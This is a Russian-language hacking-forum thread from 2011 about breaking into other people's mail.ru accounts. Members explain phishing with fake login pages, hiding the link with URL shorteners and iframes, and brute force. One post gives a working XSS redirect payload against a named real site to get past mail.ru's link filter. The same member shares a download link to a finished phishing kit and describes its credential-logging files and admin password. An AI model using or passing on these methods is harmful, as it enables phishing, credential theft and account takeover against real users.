Взлом mail.ru почты.
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Взлом mail.ru почты. - 2011-04-29 15:10:25.616666
|
|
|
Kos94ok
Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
|
Хотел бы расспросить вас о возможных взломах п/я. С одним способом уже разобрался - фейк. Но слишком палевно все это, не каждый клюнет на левую ссылку. Хотелось бы узнать о таком способе, при котором с жертвой не нужно устанавливать контакт (т.е. писать ему и просить голоснуть за что либо при этом, что ссылка очень палевная). И еще один вопрос: Как можно, так скажем, "замаскировать" ссылку. Т.е. текст ссылки один, а при переходе в URL строке нужная нам ссылка. То-есть например замаскированная ссылка http://www.radikal.ru/42142142173821.jpg, а настоящая, скажем http://www.sexygirlkaterina.1gb.ru. Спасибо.
|
|
|
RE: Взлом mail.ru почты. - 2011-04-29 15:27:35.343333
|
|
|
GoAttack
Сообщений: 842
Оценки: 189
Присоединился: 2009-05-08 23:20:55.580000
|
брут.. с жертвой не нужно устанавливать контакта http://tinyurl.com/ - сервис маскирующий ссылки.. но многие сервисы, соц. сети уже знают об этом и предупреждают при переходе по ссылке.. также попробуй использовать фреймы
|
|
|
RE: Взлом mail.ru почты. - 2011-04-29 15:43:25.116666
|
|
|
Kos94ok
Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
|
Брут совершенно бесполезен. Что такое фрейм?
|
|
|
RE: Взлом mail.ru почты. - 2011-04-29 16:25:25.006666
|
|
|
GoAttack
Сообщений: 842
Оценки: 189
Присоединился: 2009-05-08 23:20:55.580000
|
ну например у тебя на site.ru есть страничка html, с помощью фрейма ты можешь сделать, чтобы в ней отображалась другая html страничка, расположенная на site1.ru.. т.е. у тебя фейк будет расположен на site1.ru а в адресной строке будет отображаться site.ru
|
|
|
RE: Взлом mail.ru почты. - 2011-04-29 18:23:33.273333
|
|
|
sector28
Сообщений: 29
Оценки: 0
Присоединился: 2009-08-27 20:28:58.750000
|
Последнее время мейл ру очень подозрительно относится к редиректам и выводит предательское сообщение о том куда пользователь переходит, выход - использовать xssку на каком-нить другом сайте с незапятноной репутацией например http://kav.rol.ru/?userkey=aB%22%3e%3c/a%3e%3csсriрt%3edocument.location=%22http://КУДА%22%3c/sсriрt%3e Маскировку ссылки можно организовать HТМLом <a href=http://куда>надпись</a> , любой скрипт для отправки почты в этом поможет.
|
|
|
RE: Взлом mail.ru почты. - 2011-04-30 14:10:45.413333
|
|
|
Kos94ok
Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
|
Можно подробнее о редиректах и xss?
|
|
|
RE: Взлом mail.ru почты. - 2011-04-30 15:06:37.563333
|
|
|
Kos94ok
Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
|
И, у меня еще вопрос. Может кто-нибудь сделать фейк вот этой страницы?
|
|
|
RE: Взлом mail.ru почты. - 2011-04-30 22:48:18.470000
|
|
|
sector28
Сообщений: 29
Оценки: 0
Присоединился: 2009-08-27 20:28:58.750000
|
http://zalil.ru/30957548 bNdjUSmsX.php - сам список логинопаролей, просмотреть можно только скачав(через http это не получится так что парится по поводу того что могут увести базу не стоит), естессно требует прав на запись. editor.php - смотрелка той самой базы, требует пароля(UmcUnsGs18S), авторизация по кукам без шифровки. login.php - записовалка из видимой части ничего, только перенаправление на оригинальный сайт. index.html думаю и так понятно. По поводу редиректа: у мейл ру похоже есть список неблагонадежных ресурсов сообщения со ссылками на которые вообще не пропускаются или летят в спам. Суть в нахождении на каком-нибудь ресурсе, который там не числится, xss (пассивной или активной, без разницы) перенаправлении юзера через ява скрипт на нужный ресурс<script>document.location='куда'</script> (могут быть и другие варианты) и подпихивании ссылки в сообщение. В случае с пассивной нужно будет зашифровать кавычки скобки и точки 16 ричным кодом, чтобы их не покарябал фильтр.
|
|
|
RE: Взлом mail.ru почты. - 2011-05-01 06:46:31.883333
|
|
|
Kos94ok
Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
|
Спасибо за фейк.) А насчет того, что ты сказал про редиректы, я ничего не понял. В деле скриптов я пока не очень.
|
|
|
RE: Взлом mail.ru почты. - 2011-05-01 10:50:08.480000
|
|
|
Kos94ok
Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
|
http://pics.kz/s5/39/e9/eb/39e9eb001bc42c0c3d0f57c853a7b45f.jpg Можно ли как-нибудь подделать то значение?
|
|
|
RE: Взлом mail.ru почты. - 2011-05-01 10:57:03.513333
|
|
|
ManzikaX
Сообщений: 5
Оценки: 0
Присоединился: 2011-04-25 18:52:02.030000
|
Для Kos94ok: Баланс чего-либо в онлайн игре? Конечно можно, главное получить доступ управления игровым ресурсом
|
|
|
RE: Взлом mail.ru почты. - 2011-05-01 11:06:38.586666
|
|
|
Kos94ok
Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
|
Получить доступ? То есть другими словами - админ панель? Это нереально. Для меня.
|
|
|
RE: Взлом mail.ru почты. - 2011-05-02 13:09:48.016666
|
|
|
Kos94ok
Сообщений: 8
Оценки: 0
Присоединился: 2011-04-29 15:05:21.413333
|
http://pics.kz/s4/b2/db/4f/b2db4f41e613f25bfb768204bf31eab9.jpg Сделайте фейк этой странички пожалуйста.
|
|
|
|
|